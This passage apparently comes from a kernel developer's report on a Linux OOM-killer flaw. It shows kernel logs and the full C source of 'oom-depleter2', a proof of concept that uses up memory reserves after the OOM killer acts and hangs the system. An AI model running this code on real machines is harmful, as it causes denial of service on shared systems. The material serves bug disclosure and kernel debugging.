[   48.105396]  free:12966 free_pcp:63 free_cma:0
[   48.114279] Node 0 DMA free:7308kB min:400kB low:500kB high:600kB active_anon:6764kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   48.124147] lowmem_reserve[]: 0 1731 1731 1731
[   48.125753] Node 0 DMA32 free:44556kB min:44652kB low:55812kB high:66976kB active_anon:1635116kB inactive_anon:8260kB active_file:0kB inactive_file:124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1552kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:252kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1620 all_unreclaimable? yes
[   48.137007] lowmem_reserve[]: 0 0 0 0
[   48.138514] Node 0 DMA: 11*4kB (UE) 8*8kB (UEM) 6*16kB (UE) 2*32kB (EM) 0*64kB 1*128kB (U) 3*256kB (UEM) 2*512kB (UE) 3*1024kB (UEM) 1*2048kB (U) 0*4096kB = 7308kB
[   48.143010] Node 0 DMA32: 1049*4kB (UEM) 507*8kB (UE) 151*16kB (UE) 53*32kB (UEM) 83*64kB (UEM) 52*128kB (EM) 25*256kB (UEM) 11*512kB (M) 6*1024kB (UM) 1*2048kB (M) 0*4096kB = 44556kB
[   48.148196] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   48.150810] 2156 total pagecache pages
[   48.152318] 0 pages in swap cache
[   48.154200] Swap cache stats: add 0, delete 0, find 0/0
[   48.156089] Free swap  = 0kB
[   48.157400] Total swap = 0kB
[   48.158694] 524157 pages RAM
[   48.160055] 0 pages HighMem/MovableOnly
[   48.161496] 76583 pages reserved
[   48.162989] 0 pages hwpoisoned
[   48.164453] [ pid ]   uid  tgid total_vm      rss nr_ptes nr_pmds swapents oom_score_adj name
(...snipped...)
[   50.061069] [ 4797]  1000  4797   541715   392157     776       6        0             0 oom-depleter
[   50.062841] Out of memory: Kill process 3796 (oom-depleter) score 877 or sacrifice child
[   50.064684] Killed process 3796 (oom-depleter) total-vm:2166860kB, anon-rss:1568628kB, file-rss:0kB
[   50.066454] Kill process 3797 (oom-depleter) sharing same memory
(...snipped...)
[   50.247563] Kill process 3939 (oom-depleter) sharing same memory
[   50.248677] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248679] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248680] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248682]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248683]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248684]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248684] Call Trace:
[   50.248689]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248692]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248693]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248695]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248697]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248702]  [<ffffffff8100d6dc>] ? __switch_to+0x23c/0x470
[   50.248704]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248706]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248707]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248708] Mem-Info:
[   50.248710] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248710]  active_file:7 inactive_file:10 isolated_file:0
[   50.248710]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248710]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248710]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248710]  free:0 free_pcp:21 free_cma:0
[   50.248714] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248715] lowmem_reserve[]: 0 1731 1731 1731
[   50.248717] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248718] lowmem_reserve[]: 0 0 0 0
[   50.248721] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248723] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248724] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248724] 2149 total pagecache pages
[   50.248725] 0 pages in swap cache
[   50.248725] Swap cache stats: add 0, delete 0, find 0/0
[   50.248725] Free swap  = 0kB
[   50.248726] Total swap = 0kB
[   50.248726] 524157 pages RAM
[   50.248726] 0 pages HighMem/MovableOnly
[   50.248726] 76583 pages reserved
[   50.248727] 0 pages hwpoisoned
(...snipped...)
[   50.248940] oom-depleter: page allocation failure: order:0, mode:0x280da
[   50.248940] CPU: 2 PID: 3796 Comm: oom-depleter Not tainted 4.2.0-rc4-next-20150730+ #80
[   50.248940] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   50.248941]  0000000000000000 000000001529812f ffff88007be67be0 ffffffff81614c2f
[   50.248942]  00000000000280da ffff88007be67c70 ffffffff81111914 0000000000000000
[   50.248942]  ffff88007fffdb28 0000000000000000 ffff88007fc99030 ffff88007be67d30
[   50.248942] Call Trace:
[   50.248943]  [<ffffffff81614c2f>] dump_stack+0x44/0x55
[   50.248944]  [<ffffffff81111914>] warn_alloc_failed+0xf4/0x150
[   50.248945]  [<ffffffff81114b76>] __alloc_pages_nodemask+0x266/0x930
[   50.248946]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[   50.248947]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[   50.248948]  [<ffffffff81110080>] ? pagefault_out_of_memory+0x60/0xb0
[   50.248949]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[   50.248950]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[   50.248951]  [<ffffffff8161c918>] page_fault+0x28/0x30
[   50.248951] Mem-Info:
[   50.248952] active_anon:423405 inactive_anon:2085 isolated_anon:0
[   50.248952]  active_file:7 inactive_file:10 isolated_file:0
[   50.248952]  unevictable:0 dirty:0 writeback:0 unstable:0
[   50.248952]  slab_reclaimable:1689 slab_unreclaimable:5719
[   50.248952]  mapped:393 shmem:2146 pagetables:2097 bounce:0
[   50.248952]  free:0 free_pcp:21 free_cma:0
[   50.248954] Node 0 DMA free:28kB min:400kB low:500kB high:600kB active_anon:13988kB inactive_anon:80kB active_file:28kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:372kB kernel_stack:240kB pagetables:568kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:4 all_unreclaimable? no
[   50.248955] lowmem_reserve[]: 0 1731 1731 1731
[   50.248957] Node 0 DMA32 free:0kB min:44652kB low:55812kB high:66976kB active_anon:1679632kB inactive_anon:8260kB active_file:0kB inactive_file:48kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1576kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:22504kB kernel_stack:19344kB pagetables:7820kB unstable:0kB bounce:0kB free_pcp:84kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   50.248957] lowmem_reserve[]: 0 0 0 0
[   50.248959] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 DMA32: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   50.248961] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   50.248962] 2149 total pagecache pages
[   50.248962] 0 pages in swap cache
[   50.248962] Swap cache stats: add 0, delete 0, find 0/0
[   50.248962] Free swap  = 0kB
[   50.248962] Total swap = 0kB
[   50.248963] 524157 pages RAM
[   50.248963] 0 pages HighMem/MovableOnly
[   50.248963] 76583 pages reserved
[   50.248963] 0 pages hwpoisoned
[   51.212857] Kill process 3940 (oom-depleter) sharing same memory
(...snipped...)
[   52.299532] Kill process 4797 (oom-depleter) sharing same memory
[   85.966108] sysrq: SysRq : Show Memory
[   85.967079] Mem-Info:
[   85.967643] active_anon:423788 inactive_anon:2085 isolated_anon:0
[   85.967643]  active_file:0 inactive_file:1 isolated_file:0
[   85.967643]  unevictable:0 dirty:0 writeback:0 unstable:0
[   85.967643]  slab_reclaimable:1689 slab_unreclaimable:5401
[   85.967643]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[   85.967643]  free:4 free_pcp:0 free_cma:0
[   85.974400] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[   85.983232] lowmem_reserve[]: 0 1731 1731 1731
[   85.984550] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[   85.994326] lowmem_reserve[]: 0 0 0 0
[   85.995638] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[   85.998389] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[   86.001506] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   86.003604] 2147 total pagecache pages
[   86.004878] 0 pages in swap cache
[   86.006083] Swap cache stats: add 0, delete 0, find 0/0
[   86.007638] Free swap  = 0kB
[   86.008793] Total swap = 0kB
[   86.009941] 524157 pages RAM
[   86.011089] 0 pages HighMem/MovableOnly
[   86.012413] 76583 pages reserved
[   86.013632] 0 pages hwpoisoned
[  125.269135] sysrq: SysRq : Show State
[  125.270536]   task                        PC stack   pid father
[  125.272269] systemd         S ffff88007cc07a08     0     1      0 0x00000000
[  125.274343]  ffff88007cc07a08 ffff88007cc08000 ffff88007cc08000 ffff88007cc07a40
[  125.276505]  ffff88007fc0db00 00000000fffd55be ffff88007fffc000 ffff88007cc07a20
[  125.278661]  ffffffff8161793e ffff88007fc0db00 ffff88007cc07aa8 ffffffff81619fcd
[  125.280844] Call Trace:
[  125.282076]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  125.283698]  [<ffffffff81619fcd>] schedule_timeout+0x11d/0x1c0
[  125.285481]  [<ffffffff810be7c0>] ? cascade+0x90/0x90
[  125.287131]  [<ffffffff8111caef>] ? pfmemalloc_watermark_ok+0xaf/0xe0
[  125.289038]  [<ffffffff8111ccee>] throttle_direct_reclaim+0x1ce/0x240
[  125.290955]  [<ffffffff810a0870>] ? wait_woken+0x80/0x80
[  125.292676]  [<ffffffff81120bd0>] try_to_free_pages+0x80/0xc0
[  125.294478]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  125.296401]  [<ffffffff8110cb07>] ? __page_cache_alloc+0x97/0xb0
[  125.298283]  [<ffffffff8115576c>] alloc_pages_current+0x8c/0x100
[  125.300141]  [<ffffffff8110cb07>] __page_cache_alloc+0x97/0xb0
[  125.301977]  [<ffffffff8110e728>] filemap_fault+0x218/0x490
[  125.303759]  [<ffffffff81237c79>] xfs_filemap_fault+0x39/0x60
[  125.305576]  [<ffffffff81132e69>] __do_fault+0x49/0xf0
[  125.307273]  [<ffffffff8113809f>] handle_mm_fault+0xe7f/0x1960
[  125.309100]  [<ffffffff811bac6e>] ? ep_scan_ready_list.isra.12+0x19e/0x1c0
[  125.311114]  [<ffffffff811badce>] ? ep_poll+0x11e/0x320
[  125.312841]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  125.314643]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  125.316363]  [<ffffffff8161c918>] page_fault+0x28/0x30
(...snipped...)
[  130.699717] oom-depleter    x ffff88007c06bc28     0  3797      1 0x00000086
[  130.701724]  ffff88007c06bc28 ffff88007a623e80 ffff88007c06c000 ffff88007a6241d0
[  130.703703]  ffff88007c6373e8 ffff88007a623e80 ffff88007cc08000 ffff88007c06bc40
[  130.705678]  ffffffff8161793e ffff88007a624450 ffff88007c06bcb0 ffffffff8106b0d7
[  130.707654] Call Trace:
[  130.708632]  [<ffffffff8161793e>] schedule+0x2e/0x70
[  130.710064]  [<ffffffff8106b0d7>] do_exit+0x677/0xae0
[  130.711535]  [<ffffffff8106b5ba>] do_group_exit+0x3a/0xb0
[  130.713037]  [<ffffffff81074d4f>] get_signal+0x17f/0x540
[  130.714537]  [<ffffffff8100e302>] do_signal+0x32/0x650
[  130.715991]  [<ffffffff81099ffc>] ? load_balance+0x1bc/0x8b0
[  130.717545]  [<ffffffff8100362d>] prepare_exit_to_usermode+0x9d/0xf0
[  130.719275]  [<ffffffff81003753>] syscall_return_slowpath+0xd3/0x1d0
[  130.720973]  [<ffffffff816173a4>] ? __schedule+0x274/0x7e0
[  130.722536]  [<ffffffff8161793e>] ? schedule+0x2e/0x70
[  130.723989]  [<ffffffff8161af4c>] int_ret_from_sys_call+0x25/0x8f
(...snipped...)
[  157.243284] oom-depleter    R  running task        0  4797      1 0x00000084
[  157.245131]  ffff88006c482580 000000004ecba3fc ffff88007fc83c38 ffffffff8108d14a
[  157.247105]  ffff88006c482580 ffff88006c4827c0 ffff88007fc83c78 ffffffff8108d23d
[  157.249092]  ffff88006c482970 000000004ecba3fc ffffffff8188b780 0000000000000074
[  157.251054] Call Trace:
[  157.252018]  <IRQ>  [<ffffffff8108d14a>] sched_show_task+0xaa/0x110
[  157.253740]  [<ffffffff8108d23d>] show_state_filter+0x8d/0xc0
[  157.255258]  [<ffffffff813cd31b>] sysrq_handle_showstate+0xb/0x20
[  157.256898]  [<ffffffff813cda24>] __handle_sysrq+0xf4/0x150
[  157.258442]  [<ffffffff813cde10>] sysrq_filter+0x360/0x3a0
[  157.259974]  [<ffffffff81497c12>] input_to_handler+0x52/0x100
[  157.261552]  [<ffffffff81499797>] input_pass_values.part.5+0x167/0x180
[  157.263270]  [<ffffffff81499afb>] input_handle_event+0xfb/0x4f0
[  157.264875]  [<ffffffff81499f3e>] input_event+0x4e/0x70
[  157.266366]  [<ffffffff814a18eb>] atkbd_interrupt+0x5bb/0x6a0
[  157.267929]  [<ffffffff81495101>] serio_interrupt+0x41/0x80
[  157.269457]  [<ffffffff81495d7a>] i8042_interrupt+0x1da/0x3a0
[  157.271017]  [<ffffffff810b0d3b>] handle_irq_event_percpu+0x2b/0x100
[  157.272678]  [<ffffffff810b0e4a>] handle_irq_event+0x3a/0x60
[  157.274224]  [<ffffffff810b3cb6>] handle_edge_irq+0xa6/0x140
[  157.275759]  [<ffffffff81010ad9>] handle_irq+0x19/0x30
[  157.277187]  [<ffffffff81010478>] do_IRQ+0x48/0xd0
[  157.278563]  [<ffffffff8161b8c7>] common_interrupt+0x87/0x87
[  157.280091]  <EOI>  [<ffffffff810a2eb9>] ? native_queued_spin_lock_slowpath+0x19/0x180
[  157.282070]  [<ffffffff8161a95c>] _raw_spin_lock+0x1c/0x20
[  157.283597]  [<ffffffff81130bcd>] __list_lru_count_one.isra.4+0x1d/0x50
[  157.285316]  [<ffffffff81130c1e>] list_lru_count_one+0x1e/0x20
[  157.286898]  [<ffffffff8117d610>] super_cache_count+0x50/0xd0
[  157.288477]  [<ffffffff8111d1d4>] shrink_slab.part.41+0xf4/0x280
[  157.290087]  [<ffffffff81120510>] shrink_zone+0x2c0/0x2d0
[  157.291595]  [<ffffffff81120894>] do_try_to_free_pages+0x164/0x420
[  157.293242]  [<ffffffff81120be4>] try_to_free_pages+0x94/0xc0
[  157.294799]  [<ffffffff81114e14>] __alloc_pages_nodemask+0x504/0x930
[  157.296474]  [<ffffffff811569f0>] alloc_pages_vma+0xb0/0x1f0
[  157.298019]  [<ffffffff811385c0>] handle_mm_fault+0x13a0/0x1960
[  157.299606]  [<ffffffff8112ffce>] ? vmacache_find+0x1e/0xc0
[  157.301131]  [<ffffffff81055c9c>] __do_page_fault+0x17c/0x400
[  157.302676]  [<ffffffff81055f50>] do_page_fault+0x30/0x80
[  157.304169]  [<ffffffff81096b59>] ? set_next_entity+0x69/0x360
[  157.305737]  [<ffffffff8161c918>] page_fault+0x28/0x30
[  157.307186]  [<ffffffff813124c0>] ? __clear_user+0x20/0x50
[  157.308699]  [<ffffffff81316dd8>] iov_iter_zero+0x68/0x250
[  157.310210]  [<ffffffff813e9ef8>] read_iter_zero+0x38/0xa0
[  157.311713]  [<ffffffff8117ad04>] __vfs_read+0xc4/0xf0
[  157.313155]  [<ffffffff8117b489>] vfs_read+0x79/0x120
[  157.314575]  [<ffffffff8117c1a0>] SyS_read+0x50/0xc0
[  157.315980]  [<ffffffff8161adee>] entry_SYSCALL_64_fastpath+0x12/0x71
[  157.317649] Showing busy workqueues and worker pools:
[  157.319070] workqueue events: flags=0x0
[  157.320261]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=4/256
[  157.321980]     pending: vmstat_shepherd, vmstat_update, e1000_watchdog [e1000], vmpressure_work_fn
[  157.324279] workqueue events_freezable: flags=0x4
[  157.325652]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.327373]     pending: vmballoon_work [vmw_balloon]
[  157.328859] workqueue events_power_efficient: flags=0x80
[  157.330343]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.332067]     pending: neigh_periodic_work
[  157.333431] workqueue events_freezable_power_: flags=0x84
[  157.334941]   pwq 2: cpus=1 node=0 flags=0x0 nice=0 active=1/256
[  157.336684]     in-flight: 228:disk_events_workfn
[  157.338168] workqueue xfs-log/sda1: flags=0x14
[  157.339473]   pwq 7: cpus=3 node=0 flags=0x0 nice=-20 active=2/256
[  157.341255]     in-flight: 1369:xfs_log_worker
[  157.342674]     pending: xfs_buf_ioend_work
[  157.344066] pool 2: cpus=1 node=0 flags=0x0 nice=0 workers=3 idle: 43 14
[  157.346039] pool 7: cpus=3 node=0 flags=0x0 nice=-20 workers=2 manager: 27
[  185.044658] sysrq: SysRq : Show Memory
[  185.045975] Mem-Info:
[  185.046968] active_anon:423788 inactive_anon:2085 isolated_anon:0
[  185.046968]  active_file:0 inactive_file:1 isolated_file:0
[  185.046968]  unevictable:0 dirty:0 writeback:0 unstable:0
[  185.046968]  slab_reclaimable:1689 slab_unreclaimable:5401
[  185.046968]  mapped:391 shmem:2146 pagetables:2123 bounce:0
[  185.046968]  free:4 free_pcp:0 free_cma:0
[  185.056165] Node 0 DMA free:0kB min:400kB low:500kB high:600kB active_anon:14076kB inactive_anon:80kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:8kB shmem:80kB slab_reclaimable:144kB slab_unreclaimable:340kB kernel_stack:240kB pagetables:572kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:8 all_unreclaimable? yes
[  185.066444] lowmem_reserve[]: 0 1731 1731 1731
[  185.068083] Node 0 DMA32 free:16kB min:44652kB low:55812kB high:66976kB active_anon:1681076kB inactive_anon:8260kB active_file:0kB inactive_file:4kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774392kB mlocked:0kB dirty:0kB writeback:0kB mapped:1556kB shmem:8504kB slab_reclaimable:6612kB slab_unreclaimable:21264kB kernel_stack:19328kB pagetables:7920kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no
[  185.079186] lowmem_reserve[]: 0 0 0 0
[  185.080783] Node 0 DMA: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 0kB
[  185.083790] Node 0 DMA32: 3*4kB (UM) 1*8kB (U) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 36kB
[  185.087232] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  185.089572] 2147 total pagecache pages
[  185.091096] 0 pages in swap cache
[  185.092469] Swap cache stats: add 0, delete 0, find 0/0
[  185.094288] Free swap  = 0kB
[  185.095671] Total swap = 0kB
[  185.097075] 524157 pages RAM
[  185.098466] 0 pages HighMem/MovableOnly
[  185.100005] 76583 pages reserved
[  185.101435] 0 pages hwpoisoned
[  205.509157] sysrq: SysRq : Resetting
---------- Example output end ----------

In this way, I was able to deplete the memory reserves using the time window. I then got a comment asking "What about sending SIGKILL immediately after setting TIF_MEMDIE flag?", so I demonstrated again, using a different approach, that the result is the same.

---------- oom-depleter2.c start ----------
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/klog.h>

static int zero_fd = -1;
static char *buf = NULL;
static unsigned long size = 0;

static int trigger(void *unused)
{
        {
                struct sched_param sp = { };
                sched_setscheduler(0, SCHED_IDLE, &sp);
        }
        read(zero_fd, buf, size); /* Will cause OOM due to overcommit */
        return 0;
}

int main(int argc, char *argv[])
{
        unsigned long i;
        zero_fd = open("/dev/zero", O_RDONLY);
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        /* Let a child thread trigger the OOM killer. */
        clone(trigger, malloc(4096) + 4096, CLONE_SIGHAND | CLONE_VM, NULL);
        {
                struct sched_param sp = { 99 };
                sched_setscheduler(0, SCHED_FIFO, &sp);
        }
        /* Wait until the OOM killer messages appear. */
        while (1) {
                i = klogctl(2, buf, size - 1);
                if (i > 0) {
                        buf[i] = '\0';
                        if (strstr(buf, "Killed process "))
                                break;
                }
        }
        /* Deplete all memory reserve. */
        for (i = size; i; i -= 4096)
                buf[i - 1] = 1;
        return * (char *) NULL; /* Kill all threads. */
}
---------- oom-depleter2.c end ----------

# taskset -c 0 ./oom-depleter2

---------- Example output start ----------
[   47.069197] oom-depleter2 invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   47.070651] oom-depleter2 cpuset=/ mems_allowed=0
[   47.072982] CPU: 0 PID: 3851 Comm: oom-depleter2 Tainted: G        W       4.2.0-rc7-next-20150824+ #85
[   47.074683] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   47.076583]  0000000000000000 00000000115c5c6c ffff88007ca2f8c8 ffffffff81313283
[   47.078014]  ffff88007890f2c0 ffff88007ca2f970 ffffffff8117ff7d 0000000000000000
[   47.079438]  0000000000000202 0000000000000018 0000000000000001 0000000000000202
[   47.080856] Call Trace:
[   47.081335]  [<ffffffff81313283>] dump_stack+0x4b/0x78
[   47.082233]  [<ffffffff8117ff7d>] dump_header+0x82/0x232
[   47.083234]  [<ffffffff81627645>] ? _raw_spin_unlock_irqrestore+0x25/0x30
[   47.084447]  [<ffffffff810fe041>] ? delayacct_end+0x51/0x60
[   47.085483]  [<ffffffff81114fd2>] oom_kill_process+0x372/0x3c0
[   47.086551]  [<ffffffff81071cd0>] ? has_ns_capability_noaudit+0x30/0x40
[   47.087715]  [<ffffffff81071cf2>] ? has_capability_noaudit+0x12/0x20
[   47.088874]  [<ffffffff8111528d>] out_of_memory+0x21d/0x4a0
[   47.089915]  [<ffffffff8111a774>] __alloc_pages_nodemask+0x904/0x930
[   47.091010]  [<ffffffff8115d080>] alloc_pages_vma+0xb0/0x1f0
[   47.092042]  [<ffffffff8113df77>] handle_mm_fault+0x13a7/0x1950
[   47.093076]  [<ffffffff816287cd>] ? retint_kernel+0x1b/0x1d
[   47.094108]  [<ffffffff81628837>] ? native_iret+0x7/0x7
[   47.095108]  [<ffffffff810565bb>] __do_page_fault+0x18b/0x440
[   47.096109]  [<ffffffff810568a0>] do_page_fault+0x30/0x80
[   47.097052]  [<ffffffff816297e8>] page_fault+0x28/0x30
[   47.098544]  [<ffffffff81320ae0>] ? __clear_user+0x20/0x50
[   47.099651]  [<ffffffff813254b8>] iov_iter_zero+0x68/0x250
[   47.100642]  [<ffffffff810920f6>] ? sched_clock_cpu+0x86/0xc0
[   47.101701]  [<ffffffff813f9018>] read_iter_zero+0x38/0xa0
[   47.102754]  [<ffffffff81183ec4>] __vfs_read+0xc4/0xf0
[   47.103684]  [<ffffffff81184639>] vfs_read+0x79/0x120
[   47.104630]  [<ffffffff81185350>] SyS_read+0x50/0xc0
[   47.105503]  [<ffffffff8108bd9c>] ? do_sched_setscheduler+0x7c/0xb0
[   47.106637]  [<ffffffff81627cae>] entry_SYSCALL_64_fastpath+0x12/0x71
[   47.109307] Mem-Info:
[   47.109801] active_anon:416244 inactive_anon:3737 isolated_anon:0
[   47.109801]  active_file:0 inactive_file:474 isolated_file:0
[   47.109801]  unevictable:0 dirty:0 writeback:0 unstable:0
[   47.109801]  slab_reclaimable:1114 slab_unreclaimable:3896
[   47.109801]  mapped:96 shmem:4188 pagetables:1014 bounce:0
[   47.109801]  free:12368 free_pcp:183 free_cma:0
[   47.118364] Node 0 DMA free:7316kB min:400kB low:500kB high:600kB active_anon:7056kB inactive_anon:232kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:296kB slab_reclaimable:52kB slab_unreclaimable:216kB kernel_stack:16kB pagetables:308kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:28 all_unreclaimable? yes
[   47.129538] lowmem_reserve[]: 0 1731 1731 1731
[   47.131230] Node 0 DMA32 free:44016kB min:44652kB low:55812kB high:66976kB active_anon:1657920kB inactive_anon:14716kB active_file:0kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1774256kB mlocked:0kB dirty:0kB writeback:0kB mapped:384kB shmem:16456kB slab_reclaimable:4404kB slab_unreclaimable:15368kB kernel_stack:3264kB pagetables:3748kB unstable:0kB bounce:0kB free_pcp:796kB local_pcp:56kB free_cma:0kB writeback_tmp:0kB pages_scanned:124 all_unreclaimable? no
[   47.143246] lowmem_reserve[]: 0 0 0 0
[   47.145175] Node 0 DMA: 17*4kB (UE) 9*8kB (UE) 9*16kB (UEM) 1*32kB (M) 1*64kB (M) 2*128kB (UE) 2*256kB (EM) 2*512kB (EM) 1*1024kB (E) 2*2048kB (EM) 0*4096kB = 7292kB
